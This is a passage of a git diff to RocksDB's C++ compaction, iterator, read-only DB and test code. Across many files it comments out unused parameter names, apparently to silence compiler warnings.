Slice& key, ValueType t, - const Slice& existing_value, std::string* new_value, - std::string* skip_until) const override { + virtual Decision FilterV2(int /*level*/, const Slice& key, ValueType /*t*/, + const Slice& /*existing_value*/, + std::string* /*new_value*/, + std::string* /*skip_until*/) const override { int k = std::atoi(key.ToString().c_str()); last_seen.store(k); while (k >= stall_at.load()) { @@ -112,7 +113,7 @@ class LoggingForwardVectorIterator : public InternalIterator { keys_.begin(); } - virtual void SeekForPrev(const Slice& target) override { assert(false); } + virtual void SeekForPrev(const Slice& /*target*/) override { assert(false); } virtual void Next() override { assert(Valid()); @@ -144,9 +145,9 @@ class FakeCompaction : public CompactionIterator::CompactionProxy { public: FakeCompaction() = default; - virtual int level(size_t compaction_input_level) const { return 0; } + virtual int level(size_t /*compaction_input_level*/) const { return 0; } virtual bool KeyNotExistsBeyondOutputLevel( - const Slice& user_key, std::vector* level_ptrs) const { + const Slice& /*user_key*/, std::vector* /*level_ptrs*/) const { return key_not_exists_beyond_output_level; } virtual bool bottommost_level() const { return false; } @@ -276,9 +277,9 @@ TEST_F(CompactionIteratorTest, RangeDeletionWithSnapshots) { TEST_F(CompactionIteratorTest, CompactionFilterSkipUntil) { class Filter : public CompactionFilter { - virtual Decision FilterV2(int level, const Slice& key, ValueType t, + virtual Decision FilterV2(int /*level*/, const Slice& key, ValueType t, const Slice& existing_value, - std::string* new_value, + std::string* /*new_value*/, std::string* skip_until) const override { std::string k = key.ToString(); std::string v = existing_value.ToString(); diff --git a/db/compaction_job_stats_test.cc b/db/compaction_job_stats_test.cc index 9a8372f5785..c20c120e580 100644 --- a/db/compaction_job_stats_test.cc +++ b/db/compaction_job_stats_test.cc @@ -426,7 +426,7 @@ class CompactionJobStatsChecker : public EventListener { // Once a compaction completed, this function will verify the returned // CompactionJobInfo with the oldest CompactionJobInfo added earlier // in "expected_stats_" which has not yet being used for verification. - virtual void OnCompactionCompleted(DB *db, const CompactionJobInfo& ci) { + virtual void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) { if (verify_next_comp_io_stats_) { ASSERT_GT(ci.stats.file_write_nanos, 0); ASSERT_GT(ci.stats.file_range_sync_nanos, 0); @@ -806,7 +806,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { stats_checker->set_verify_next_comp_io_stats(true); std::atomic first_prepare_write(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::Append:BeforePrepareWrite", [&](void* arg) { + "WritableFileWriter::Append:BeforePrepareWrite", [&](void* /*arg*/) { if (first_prepare_write.load()) { options.env->SleepForMicroseconds(3); first_prepare_write.store(false); @@ -815,7 +815,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { std::atomic first_flush(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::Flush:BeforeAppend", [&](void* arg) { + "WritableFileWriter::Flush:BeforeAppend", [&](void* /*arg*/) { if (first_flush.load()) { options.env->SleepForMicroseconds(3); first_flush.store(false); @@ -824,7 +824,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { std::atomic first_sync(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::SyncInternal:0", [&](void* arg) { + "WritableFileWriter::SyncInternal:0", [&](void* /*arg*/) { if (first_sync.load()) { options.env->SleepForMicroseconds(3); first_sync.store(false); @@ -833,7 +833,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { std::atomic first_range_sync(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::RangeSync:0", [&](void* arg) { + "WritableFileWriter::RangeSync:0", [&](void* /*arg*/) { if (first_range_sync.load()) { options.env->SleepForMicroseconds(3); first_range_sync.store(false); diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc index 6ee4ebd1f16..7264ed20c6f 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -199,7 +199,7 @@ void CompactionPicker::GetRange(const std::vector& inputs, assert(initialized); } -bool CompactionPicker::ExpandInputsToCleanCut(const std::string& cf_name, +bool CompactionPicker::ExpandInputsToCleanCut(const std::string& /*cf_name*/, VersionStorageInfo* vstorage, CompactionInputFiles* inputs) { // This isn't good compaction @@ -318,7 +318,7 @@ Compaction* CompactionPicker::CompactFiles( Status CompactionPicker::GetCompactionInputsFromFileNumbers( std::vector* input_files, std::unordered_set* input_set, const VersionStorageInfo* vstorage, - const CompactionOptions& compact_options) const { + const CompactionOptions& /*compact_options*/) const { if (input_set->size() == 0U) { return Status::InvalidArgument( "Compaction must include at least one file."); @@ -1581,8 +1581,9 @@ Compaction* FIFOCompactionPicker::PickCompaction( Compaction* FIFOCompactionPicker::CompactRange( const std::string& cf_name, const MutableCFOptions& mutable_cf_options, VersionStorageInfo* vstorage, int input_level, int output_level, - uint32_t output_path_id, const InternalKey* begin, const InternalKey* end, - InternalKey** compaction_end, bool* manual_conflict) { + uint32_t /*output_path_id*/, const InternalKey* /*begin*/, + const InternalKey* /*end*/, InternalKey** compaction_end, + bool* /*manual_conflict*/) { assert(input_level == 0); assert(output_level == 0); *compaction_end = nullptr; diff --git a/db/compaction_picker.h b/db/compaction_picker.h index f44139c2dd9..44b93d7747b 100644 --- a/db/compaction_picker.h +++ b/db/compaction_picker.h @@ -263,27 +263,29 @@ class NullCompactionPicker : public CompactionPicker { virtual ~NullCompactionPicker() {} // Always return "nullptr" - Compaction* PickCompaction(const std::string& cf_name, - const MutableCFOptions& mutable_cf_options, - VersionStorageInfo* vstorage, - LogBuffer* log_buffer) override { + Compaction* PickCompaction(const std::string& /*cf_name*/, + const MutableCFOptions& /*mutable_cf_options*/, + VersionStorageInfo* /*vstorage*/, + LogBuffer* /*log_buffer*/) override { return nullptr; } // Always return "nullptr" - Compaction* CompactRange(const std::string& cf_name, - const MutableCFOptions& mutable_cf_options, - VersionStorageInfo* vstorage, int input_level, - int output_level, uint32_t output_path_id, - const InternalKey* begin, const InternalKey* end, - InternalKey** compaction_end, - bool* manual_conflict) override { + Compaction* CompactRange(const std::string& /*cf_name*/, + const MutableCFOptions& /*mutable_cf_options*/, + VersionStorageInfo* /*vstorage*/, + int /*input_level*/, int /*output_level*/, + uint32_t /*output_path_id*/, + const InternalKey* /*begin*/, + const InternalKey* /*end*/, + InternalKey** /*compaction_end*/, + bool* /*manual_conflict*/) override { return nullptr; } // Always returns false. virtual bool NeedsCompaction( - const VersionStorageInfo* vstorage) const override { + const VersionStorageInfo* /*vstorage*/) const override { return false; } }; diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc index 1ced12cfd5d..7e981451725 100644 --- a/db/compaction_picker_test.cc +++ b/db/compaction_picker_test.cc @@ -20,7 +20,9 @@ namespace rocksdb { class CountingLogger : public Logger { public: using Logger::Logv; - virtual void Logv(const char* format, va_list ap) override { log_count++; } + virtual void Logv(const char* /*format*/, va_list /*ap*/) override { + log_count++; + } size_t log_count; }; diff --git a/db/comparator_db_test.cc b/db/comparator_db_test.cc index 28a2a5658e7..83740ffda00 100644 --- a/db/comparator_db_test.cc +++ b/db/comparator_db_test.cc @@ -188,10 +188,10 @@ class DoubleComparator : public Comparator { return -1; } } - virtual void FindShortestSeparator(std::string* start, - const Slice& limit) const override {} + virtual void FindShortestSeparator(std::string* /*start*/, + const Slice& /*limit*/) const override {} - virtual void FindShortSuccessor(std::string* key) const override {} + virtual void FindShortSuccessor(std::string* /*key*/) const override {} }; class HashComparator : public Comparator { @@ -211,10 +211,10 @@ class HashComparator : public Comparator { return -1; } } - virtual void FindShortestSeparator(std::string* start, - const Slice& limit) const override {} + virtual void FindShortestSeparator(std::string* /*start*/, + const Slice& /*limit*/) const override {} - virtual void FindShortSuccessor(std::string* key) const override {} + virtual void FindShortSuccessor(std::string* /*key*/) const override {} }; class TwoStrComparator : public Comparator { @@ -243,10 +243,10 @@ class TwoStrComparator : public Comparator { } return a2.compare(b2); } - virtual void FindShortestSeparator(std::string* start, - const Slice& limit) const override {} + virtual void FindShortestSeparator(std::string* /*start*/, + const Slice& /*limit*/) const override {} - virtual void FindShortSuccessor(std::string* key) const override {} + virtual void FindShortSuccessor(std::string* /*key*/) const override {} }; } // namespace diff --git a/db/db_block_cache_test.cc b/db/db_block_cache_test.cc index 169cadc85c3..f4d61eefe6a 100644 --- a/db/db_block_cache_test.cc +++ b/db/db_block_cache_test.cc @@ -47,7 +47,7 @@ class DBBlockCacheTest : public DBTestBase { return options; } - void InitTable(const Options& options) { + void InitTable(const Options& /*options*/) { std::string value(kValueSize, 'a'); for (size_t i = 0; i < kNumBlocks; i++) { ASSERT_OK(Put(ToString(i), value.c_str())); diff --git a/db/db_bloom_filter_test.cc b/db/db_bloom_filter_test.cc index e6248a04014..d4b034c5346 100644 --- a/db/db_bloom_filter_test.cc +++ b/db/db_bloom_filter_test.cc @@ -1057,10 +1057,10 @@ TEST_F(DBBloomFilterTest, OptimizeFiltersForHits) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial_move++; }); + [&](void* /*arg*/) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); CompactRangeOptions compact_options; diff --git a/db/db_compaction_filter_test.cc b/db/db_compaction_filter_test.cc index 9f751f059fa..a25adcc356f 100644 --- a/db/db_compaction_filter_test.cc +++ b/db/db_compaction_filter_test.cc @@ -26,9 +26,9 @@ class DBTestCompactionFilter : public DBTestBase { class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, bool* value_changed) const - override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { cfilter_count++; return false; } @@ -38,9 +38,9 @@ class KeepFilter : public CompactionFilter { class DeleteFilter : public CompactionFilter { public: - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, bool* value_changed) const - override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { cfilter_count++; return true; } @@ -50,9 +50,9 @@ class DeleteFilter : public CompactionFilter { class DeleteISFilter : public CompactionFilter { public: - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& key, const Slice& /*value*/, + std::string* /*new_value*/, + bool* /*value_changed*/) const override { cfilter_count++; int i = std::stoi(key.ToString()); if (i > 5 && i <= 105) { @@ -70,8 +70,10 @@ class DeleteISFilter : public CompactionFilter { // zero-padded to length 10. class SkipEvenFilter : public CompactionFilter { public: - virtual Decision FilterV2(int level, const Slice& key, ValueType value_type, - const Slice& existing_value, std::string* new_value, + virtual Decision FilterV2(int /*level*/, const Slice& key, + ValueType /*value_type*/, + const Slice& /*existing_value*/, + std::string* /*new_value*/, std::string* skip_until) const override { cfilter_count++; int i = std::stoi(key.ToString()); @@ -93,9 +95,9 @@ class SkipEvenFilter : public CompactionFilter { class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -110,9 +112,9 @@ class ConditionalFilter : public CompactionFilter { public: explicit ConditionalFilter(const std::string* filtered_value) : filtered_value_(filtered_value) {} - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, const Slice& value, + std::string* /*new_value*/, + bool* /*value_changed*/) const override { return value.ToString() == *filtered_value_; } @@ -126,9 +128,9 @@ class ChangeFilter : public CompactionFilter { public: explicit ChangeFilter() {} - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, bool* value_changed) const - override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* new_value, + bool* value_changed) const override { assert(new_value != nullptr); *new_value = NEW_VALUE; *value_changed = true; @@ -217,7 +219,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& context) override { + const CompactionFilter::Context& /*context*/) override { return std::unique_ptr(new DelayFilter(db_test)); } @@ -233,7 +235,7 @@ class ConditionalFilterFactory : public CompactionFilterFactory { : filtered_value_(filtered_value.ToString()) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& context) override { + const CompactionFilter::Context& /*context*/) override { return std::unique_ptr( new ConditionalFilter(&filtered_value_)); } @@ -251,7 +253,7 @@ class ChangeFilterFactory : public CompactionFilterFactory { explicit ChangeFilterFactory() {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& context) override { + const CompactionFilter::Context& /*context*/) override { return std::unique_ptr(new ChangeFilter()); } diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc index 4c7da8d1b50..898db51ef7a 100644 --- a/db/db_compaction_test.cc +++ b/db/db_compaction_test.cc @@ -53,7 +53,7 @@ class FlushedFileCollector : public EventListener { FlushedFileCollector() {} ~FlushedFileCollector() {} - virtual void OnFlushCompleted(DB* db, const FlushJobInfo& info) override { + virtual void OnFlushCompleted(DB* /*db*/, const FlushJobInfo& info) override { std::lock_guard lock(mutex_); flushed_files_.push_back(info.file_path); } @@ -282,7 +282,7 @@ TEST_F(DBCompactionTest, TestTableReaderForCompaction) { }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TableCache::GetTableReader:0", - [&](void* arg) { num_new_table_reader++; }); + [&](void* /*arg*/) { num_new_table_reader++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); for (int k = 0; k < options.level0_file_num_compaction_trigger; ++k) { @@ -838,7 +838,7 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveOneFile) { int32_t trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -895,10 +895,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveNonOverlappingFiles) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial_move++; }); + [&](void* /*arg*/) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -994,10 +994,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveTargetLevel) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial_move++; }); + [&](void* /*arg*/) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -1053,10 +1053,10 @@ TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial_move++; }); + [&](void* /*arg*/) { non_trivial_move++; }); bool first = true; // Purpose of dependencies: // 4 -> 1: ensure the order of two non-trivial compactions @@ -1067,7 +1067,7 @@ TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) { {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:2"}, {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (first) { first = false; TEST_SYNC_POINT("DBCompaction::ManualPartial:4"); @@ -1198,17 +1198,17 @@ TEST_F(DBCompactionTest, DISABLED_ManualPartialFill) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial_move++; }); + [&](void* /*arg*/) { non_trivial_move++; }); bool first = true; bool second = true; rocksdb::SyncPoint::GetInstance()->LoadDependency( {{"DBCompaction::PartialFill:4", "DBCompaction::PartialFill:1"}, {"DBCompaction::PartialFill:2", "DBCompaction::PartialFill:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (first) { TEST_SYNC_POINT("DBCompaction::PartialFill:4"); first = false; @@ -1444,10 +1444,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveToLastLevelWithFiles) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial_move++; }); + [&](void* /*arg*/) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -2325,16 +2325,16 @@ TEST_P(DBCompactionTestWithParam, CompressLevelCompaction) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "Compaction::InputCompressionMatchesOutput:Matches", - [&](void* arg) { matches++; }); + [&](void* /*arg*/) { matches++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "Compaction::InputCompressionMatchesOutput:DidntMatch", - [&](void* arg) { didnt_match++; }); + [&](void* /*arg*/) { didnt_match++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial++; }); + [&](void* /*arg*/) { non_trivial++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Reopen(options); @@ -2496,10 +2496,10 @@ TEST_P(DBCompactionTestWithParam, ForceBottommostLevelCompaction) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial_move++; }); + [&](void* /*arg*/) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -2656,9 +2656,7 @@ TEST_P(DBCompactionDirectIOTest, DirectIO) { }); if (options.use_direct_io_for_flush_and_compaction) { SyncPoint::GetInstance()->SetCallBack( - "SanitizeOptions:direct_io", [&](void* arg) { - readahead = true; - }); + "SanitizeOptions:direct_io", [&](void* /*arg*/) { readahead = true; }); } SyncPoint::GetInstance()->EnableProcessing(); CreateAndReopenWithCF({"pikachu"}, options); diff --git a/db/db_dynamic_level_test.cc b/db/db_dynamic_level_test.cc index f968e7fc057..6542db18c02 100644 --- a/db/db_dynamic_level_test.cc +++ b/db/db_dynamic_level_test.cc @@ -194,7 +194,7 @@ TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBase2) { // Hold compaction jobs to make sure rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::Run():Start", - [&](void* arg) { env_->SleepForMicroseconds(100000); }); + [&](void* /*arg*/) { env_->SleepForMicroseconds(100000); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); ASSERT_OK(dbfull()->SetOptions({ {"disable_auto_compactions", "true"}, @@ -378,7 +378,7 @@ TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBaseInc) { int non_trivial = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial++; }); + [&](void* /*arg*/) { non_trivial++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Random rnd(301); diff --git a/db/db_flush_test.cc b/db/db_flush_test.cc index 107e82467cb..0dab8bfe59a 100644 --- a/db/db_flush_test.cc +++ b/db/db_flush_test.cc @@ -101,7 +101,7 @@ TEST_F(DBFlushTest, FlushInLowPriThreadPool) { std::thread::id tid; int num_flushes = 0, num_compactions = 0; SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BGWorkFlush", [&](void* arg) { + "DBImpl::BGWorkFlush", [&](void* /*arg*/) { if (tid == std::thread::id()) { tid = std::this_thread::get_id(); } else { @@ -110,7 +110,7 @@ TEST_F(DBFlushTest, FlushInLowPriThreadPool) { ++num_flushes; }); SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BGWorkCompaction", [&](void* arg) { + "DBImpl::BGWorkCompaction", [&](void* /*arg*/) { ASSERT_EQ(tid, std::this_thread::get_id()); ++num_compactions; }); diff --git a/db/db_impl.cc b/db/db_impl.cc index f770b51ae7f..97f9b202405 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -595,8 +595,9 @@ Status DBImpl::SetDBOptions( } // return the same level if it cannot be moved -int DBImpl::FindMinimumEmptyLevelFitting(ColumnFamilyData* cfd, - const MutableCFOptions& mutable_cf_options, int level) { +int DBImpl::FindMinimumEmptyLevelFitting( + ColumnFamilyData* cfd, const MutableCFOptions& /*mutable_cf_options*/, + int level) { mutex_.AssertHeld(); const auto* vstorage = cfd->current()->storage_info(); int minimum_level = level; @@ -806,7 +807,7 @@ struct IterState { bool background_purge; }; -static void CleanupIteratorState(void* arg1, void* arg2) { +static void CleanupIteratorState(void* arg1, void* /*arg2*/) { IterState* state = reinterpret_cast(arg1); if (state->super_version->Unref()) { @@ -2190,31 +2191,31 @@ Status DBImpl::GetDbIdentity(std::string& identity) const { } // Default implementation -- returns not supported status -Status DB::CreateColumnFamily(const ColumnFamilyOptions& cf_options, - const std::string& column_family_name, - ColumnFamilyHandle** handle) { +Status DB::CreateColumnFamily(const ColumnFamilyOptions& /*cf_options*/, + const std::string& /*column_family_name*/, + ColumnFamilyHandle** /*handle*/) { return Status::NotSupported(""); } Status DB::CreateColumnFamilies( - const ColumnFamilyOptions& cf_options, - const std::vector& column_family_names, - std::vector* handles) { + const ColumnFamilyOptions& /*cf_options*/, + const std::vector& /*column_family_names*/, + std::vector* /*handles*/) { return Status::NotSupported(""); } Status DB::CreateColumnFamilies( - const std::vector& column_families, - std::vector* handles) { + const std::vector& /*column_families*/, + std::vector* /*handles*/) { return Status::NotSupported(""); } -Status DB::DropColumnFamily(ColumnFamilyHandle* column_family) { +Status DB::DropColumnFamily(ColumnFamilyHandle* /*column_family*/) { return Status::NotSupported(""); } Status DB::DropColumnFamilies( - const std::vector& column_families) { + const std::vector& /*column_families*/) { return Status::NotSupported(""); } diff --git a/db/db_impl_compaction_flush.cc b/db/db_impl_compaction_flush.cc index 68d2831233b..e04fc6ee93e 100644 --- a/db/db_impl_compaction_flush.cc +++ b/db/db_impl_compaction_flush.cc @@ -779,7 +779,7 @@ int DBImpl::NumberLevels(ColumnFamilyHandle* column_family) { return cfh->cfd()->NumberLevels(); } -int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* column_family) { +int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* /*column_family*/) { return 0; } diff --git a/db/db_impl_readonly.cc b/db/db_impl_readonly.cc index d4fe7e702f8..e3970306572 100644 --- a/db/db_impl_readonly.cc +++ b/db/db_impl_readonly.cc @@ -105,7 +105,7 @@ Status DBImplReadOnly::NewIterators( } Status DB::OpenForReadOnly(const Options& options, const std::string& dbname, - DB** dbptr, bool error_if_log_file_exist) { + DB** dbptr, bool /*error_if_log_file_exist*/) { *dbptr = nullptr; // Try to first open DB as fully compacted DB diff --git a/db/db_impl_readonly.h b/db/db_impl_readonly.h index 9bdc95cc874..35f2d1c8586 100644 --- a/db/db_impl_readonly.h +++ b/db/db_impl_readonly.h @@ -36,46 +36,47 @@ class DBImplReadOnly : public DBImpl { std::vector* iterators) override; using DBImpl::Put; - virtual Status Put(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override { + virtual Status Put(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, const Slice& /*value*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Merge; - virtual Status Merge(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override { + virtual Status Merge(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, const Slice& /*value*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Delete; - virtual Status Delete(const WriteOptions& options, - ColumnFamilyHandle* column_family, - const Slice& key) override { + virtual Status Delete(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::SingleDelete; - virtual Status SingleDelete(const WriteOptions& options, - ColumnFamilyHandle* column_family, - const Slice& key) override { + virtual Status SingleDelete(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/) override { return Status::NotSupported("Not supported operation in read only mode."); } - virtual Status Write(const WriteOptions& options, - WriteBatch* updates) override { + virtual Status Write(const WriteOptions& /*options*/, + WriteBatch* /*updates*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& options, - ColumnFamilyHandle* column_family, - const Slice* begin, const Slice* end) override { + virtual Status CompactRange(const CompactRangeOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice* /*begin*/, + const Slice* /*end*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::CompactFiles; virtual Status CompactFiles( - const CompactionOptions& compact_options, - ColumnFamilyHandle* column_family, - const std::vector& input_file_names, - const int output_level, const int output_path_id = -1) override { + const CompactionOptions& /*compact_options*/, + ColumnFamilyHandle* /*column_family*/, + const std::vector& /*input_file_names*/, + const int /*output_level*/, const int /*output_path_id*/ = -1) override { return Status::NotSupported("Not supported operation in read only mode."); } @@ -83,18 +84,18 @@ class DBImplReadOnly : public DBImpl { return Status::NotSupported("Not supported operation in read only mode."); } - virtual Status EnableFileDeletions(bool force) override { + virtual Status EnableFileDeletions(bool /*force*/) override { return Status::NotSupported("Not supported operation in read only mode."); } virtual Status GetLiveFiles(std::vector&, - uint64_t* manifest_file_size, - bool flush_memtable = true) override { + uint64_t* /*manifest_file_size*/, + bool /*flush_memtable*/ = true) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Flush; - virtual Status Flush(const FlushOptions& options, - ColumnFamilyHandle* column_family) override { + virtual Status Flush(const FlushOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/) override { return Status::NotSupported("Not supported operation in read only mode."); } @@ -105,9 +106,9 @@ class DBImplReadOnly : public DBImpl { using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* column_family, - const std::vector& external_files, - const IngestExternalFileOptions& ingestion_options) override { + ColumnFamilyHandle* /*column_family*/, + const std::vector& /*external_files*/, + const IngestExternalFileOptions& /*ingestion_options*/) override { return Status::NotSupported("Not supported operation in read only mode."); } diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index f52bce611a9..2579cc87cfd 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -1002,7 +1002,7 @@ Status DBImpl::ScheduleFlushes(WriteContext* context) { } #ifndef ROCKSDB_LITE -void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* cfd, +void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* /*cfd*/, const MemTableInfo& mem_table_info) { if (immutable_db_options_.listeners.size() == 0U) { return; diff --git a/db/db_iter_test.cc b/db/db_iter_test.cc index 1b7c13b06f3..88493ccfbfb 100644 --- a/db/db_iter_test.cc +++ b/db/db_iter_test.cc @@ -2459,7 +2459,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace1) { // and before an SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( "MergeIterator::Prev:BeforeSeekToLast", - [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 12u); }); + [&](void* 